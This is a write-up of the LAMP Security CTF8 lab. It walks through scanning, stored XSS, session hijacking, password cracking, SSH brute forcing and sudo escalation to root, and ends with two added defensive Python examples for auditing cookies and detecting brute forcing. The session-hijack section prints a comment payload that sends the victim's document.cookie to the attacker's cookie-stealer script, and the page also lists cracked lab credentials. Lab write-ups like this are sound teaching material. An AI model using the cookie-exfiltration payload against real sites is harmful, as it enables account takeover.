April 28, 2019

LAMP Security CTF8 Walkthrough



In this article I am going to capture the flags in the LampSecurity CTF 8 challenge. This is a beginner-level challenge. We will start by scanning the environment and end by getting root access; in between, my target will be to capture the hidden flags. So let's get started.

List of actions:

  •  Scan the network
  •  HTTP enumeration
  •  Web vulnerability scanning
  •  Spidering Web directory
  •  Session hijack
  •  Crack the password
  •  Brute-forcing SSH credentials
  •  Get the access and capture the flags
  •  Root privilege

Before we start scanning, let's first discover the network with netdiscover.

We have successfully discovered our target.



1      Scan the network
We will start with a network scan using nmap. To do this, let's execute the command below in the Kali console.

The output shows that the following ports are open.

- 21
- 22
- 25
- 80
- 110
- 111
- 139
- 143
- 443
- 445
- 993
- 995
- 3306
- 5801, 5802, 5901, 5902, 5903, 5904
- 6001, 6002, 6004, 6003

Based on the above result, it is confirmed that a web application is running on port 80, so we will choose that as our starting point.



2      Web vulnerability scanning
Let's scan the web application with Nikto and try to discover the vulnerabilities present.

After the scan we got the results below, which are important for the rest of the walkthrough.
- The phpinfo.php page is available to access.

- The application is vulnerable to XSS attacks.



Now, while exploring the web application, let's check the source code of the home page.

We have successfully captured our first flag.
#flag#550e1bafe077ff0b0b67f4e32f29d751

Having got the first flag, we will go back to the Nikto result and explore the phpinfo page.

Great!! We have got our second flag in a row.

#flag#550e1bafe077ff0b0b67f4e32f29d751

3      Spidering Web directory
Now go to the home page and read any of the articles to get a further clue.

While exploring the page I found a new directory which was not displayed during the vulnerability scan. So we will scan the directory using dirb to get any useful information.

In the scan results I found something different, which pushed me to check further.

Let's explore the above path and see what else we can get.

Bingo! We have got our third flag.
#flag#57dbe55b42b307fb4115146d239955d0

4      Session hijack
Now let's create a user account to get user access.

I have successfully created a user named "iamuser". Now go to any of the blog posts and check whether the comment section is vulnerable to XSS.

Enter the script below and click on preview:
<script>alert('hi')</script>

From the above result it is clear that the application is vulnerable to XSS.

Now we will try to hijack the session cookie of the writer of the blog and forward it to a cookie capture application running on our own server. To know more, please click here to read the previous article.

To do this, paste the HTML code below into the comment box and save it.

<html>
<body>
<b> wanteddev</b>
<u>click me</u>
<iframe frameboarder=0 height=0 width=0 src=javascript:void(document.location="http://192.168.1.2/Cookie_stealer.php?c="+document.cookie)> </iframe >
</body>
</html>



The above code will give us the session ID of whoever visits the comment first. Here we will make the blog writer visit the link so that we get his cookie and hijack his session. To do that, we will send the link to him via email and wait until he clicks on it.

Now click on the username.

After that, paste the link into the contact form and send it to the user.

Now wait a couple of minutes and we will get the session ID on our server.

We have successfully got the session ID.

Now we will try to take over the session by pasting the copied session ID using the Cookie Manager Firefox plugin.
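Seen from the defending side, the payload above works only because the session cookie is readable through document.cookie and the comment markup is rendered unencoded. The following added example (not part of the original walkthrough; the cookie values are constructed, and the SESS prefix reflects Drupal's session-cookie naming) audits Set-Cookie headers for the attributes that block this and shows the comment text encoded on output.

```python
import html

# Constructed Set-Cookie values for illustration; not captured from the CTF8 host.
# Assumption: the session cookie carries Drupal's "SESS" name prefix.
WEAK = ["SESS0123abcd=f3a9c1d2; path=/", "has_js=1; path=/"]
HARDENED = ["SESS0123abcd=f3a9c1d2; path=/; HttpOnly; Secure; SameSite=Lax",
            "has_js=1; path=/"]

REQUIRED = ("httponly", "secure", "samesite")


def parse_set_cookie(header):
    """Split one Set-Cookie value into (name, value, attrs); attribute names lower-cased."""
    first, *rest = [part.strip() for part in header.split(";")]
    name, _, value = first.partition("=")
    attrs = {}
    for part in rest:
        if part:
            key, _, val = part.partition("=")
            attrs[key.strip().lower()] = val.strip()
    return name, value, attrs


def script_readable(headers):
    """Names of cookies that page script can read via document.cookie (no HttpOnly)."""
    return [name for name, _, attrs in map(parse_set_cookie, headers)
            if "httponly" not in attrs]


def audit_sessions(headers):
    """Map each session cookie to the protective attributes it is missing."""
    report = {}
    for name, _, attrs in map(parse_set_cookie, headers):
        if name.startswith("SESS"):
            report[name] = [flag for flag in REQUIRED if flag not in attrs]
    return report


def render_comment(body):
    """Encode user-supplied comment text so the browser displays markup instead of running it."""
    return html.escape(body, quote=True)


if __name__ == "__main__":
    print("readable by script (weak):    ", script_readable(WEAK))
    print("readable by script (hardened):", script_readable(HARDENED))
    print("missing attributes:", audit_sessions(WEAK))
    print(render_comment("<script>alert('hi')</script>"))
```

With HttpOnly set, the session cookie no longer appears in document.cookie, so injected script has nothing to forward even if an encoding gap remains elsewhere.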



Our next step will be to post the SQL query and try to fetch the user details.

As we know, Drupal's default table is user, and the columns for user and password are user and pass respectively.

So please go to content management and create content, then click on page. Now copy and paste the SQL with PHP code below, select the content type as PHP, and then click on preview.

You will successfully get the current user details with the MD5 password hashes.



5      Crack the password
Save the hashes in a file and try to crack them using the John the Ripper tool.

After the cracking process we got the results below.



6      Brute-forcing SSH credentials
Let's save the users and passwords in separate files for our next step, which is brute-forcing the SSH login.

After that, let's execute the command below in the terminal.

And wait for a success message.

So sad, we did not get any success. Still, there is no need to worry; let's explore the blogger profile and see if we get any further hint.

From the above screenshot we can see that the user Steve has his username in the email as spinkton. Similarly, we will check each user profile by editing the URL and store the usernames in a file.

Now let's try to brute-force again with the new user list.

This time we have got three SUCCESS credentials, as follows:

bdio – passw0rd
jharraway – letmein!
spinkton – football123
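
What the password guessing in this section looks like to the server's operator, as an added example that is not part of the original walkthrough: a detector that reads sshd authentication log lines and flags a source that fails logins across several accounts and then has passwords accepted. The log lines are constructed, and the function name and thresholds are assumptions chosen for the sample.

```python
import re
from collections import defaultdict

# Constructed sshd auth-log lines in OpenSSH's message format. Host name, times,
# ports and addresses are made up; the account names are the ones on this page.
SAMPLE_LOG = """\
Apr 28 10:01:01 ctf8 sshd[2101]: Failed password for bdio from 192.168.1.2 port 40110 ssh2
Apr 28 10:01:01 ctf8 sshd[2102]: Failed password for jharraway from 192.168.1.2 port 40111 ssh2
Apr 28 10:01:02 ctf8 sshd[2103]: Failed password for spinkton from 192.168.1.2 port 40112 ssh2
Apr 28 10:01:02 ctf8 sshd[2104]: Failed password for invalid user iamuser from 192.168.1.2 port 40113 ssh2
Apr 28 10:01:03 ctf8 sshd[2105]: Failed password for bdio from 192.168.1.2 port 40114 ssh2
Apr 28 10:01:03 ctf8 sshd[2106]: Accepted password for bdio from 192.168.1.2 port 40115 ssh2
Apr 28 10:01:04 ctf8 sshd[2107]: Failed password for jharraway from 192.168.1.2 port 40116 ssh2
Apr 28 10:01:05 ctf8 sshd[2108]: Accepted password for jharraway from 192.168.1.2 port 40117 ssh2
Apr 28 10:07:30 ctf8 sshd[2140]: Failed password for spinkton from 192.168.1.50 port 51002 ssh2
Apr 28 10:07:41 ctf8 sshd[2141]: Accepted password for spinkton from 192.168.1.50 port 51003 ssh2
"""

EVENT = re.compile(
    r"sshd\[\d+\]: (Failed|Accepted) password for (?:invalid user )?(\S+) from (\S+) port \d+")


def detect_password_guessing(log_text, min_failures=5, min_users=3):
    """Report sources that fail logins across several accounts, and which accounts
    then accepted a password from that same source."""
    failures = defaultdict(int)
    users_tried = defaultdict(set)
    accepted = defaultdict(list)
    for line in log_text.splitlines():
        match = EVENT.search(line)
        if not match:
            continue
        outcome, user, source = match.groups()
        if outcome == "Failed":
            failures[source] += 1
            users_tried[source].add(user)
        elif failures[source] and user not in accepted[source]:
            accepted[source].append(user)  # success preceded by failures from this source
    alerts = {}
    for source, count in failures.items():
        # A single mistyped password (192.168.1.50 above) stays below both thresholds.
        if count >= min_failures and len(users_tried[source]) >= min_users:
            alerts[source] = {"failures": count,
                              "users_tried": sorted(users_tried[source]),
                              "accepted_after_failures": accepted[source]}
    return alerts


if __name__ == "__main__":
    for source, detail in detect_password_guessing(SAMPLE_LOG).items():
        print(source, detail)
```

A non-empty accepted_after_failures list means those accounts need password resets; setting PasswordAuthentication no in sshd_config and requiring keys removes the guessing surface altogether.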

7      Get the access and capture the flags

Let's try to log in with each one in turn.

Great, we have got another flag here.

Now try to log in with the next credential. Nice! We have got another flag inside this.

Let's move to the next credential. Again! We have got one more flag inside.



8      Root privilege
After all this, let's try a sudo login to check whether this user has root privilege.

Awesome!! We have successfully got the root user.
Thanks for reading my article. Please let me know your valuable feedback in the comment section below.







